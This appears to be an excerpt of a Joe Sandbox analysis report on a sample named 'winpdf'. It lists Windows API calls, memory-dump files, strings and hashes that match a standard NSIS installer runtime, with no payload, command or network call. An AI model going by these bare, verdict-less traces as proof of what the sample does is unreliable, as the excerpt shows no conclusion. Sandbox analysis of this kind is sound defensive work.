                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                APIs
                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                APIs
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                • String ID: 82D$@%F$@rD$A
                                                                                                                                                                • API String ID: 3347642858-1086125096
                                                                                                                                                                • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                Strings
                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                • \*.*, xrefs: 00406D03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                • API String ID: 2035342205-3294556389
                                                                                                                                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                • API String ID: 3581403547-784952888
                                                                                                                                                                • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                APIs
                                                                                                                                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                Strings
                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
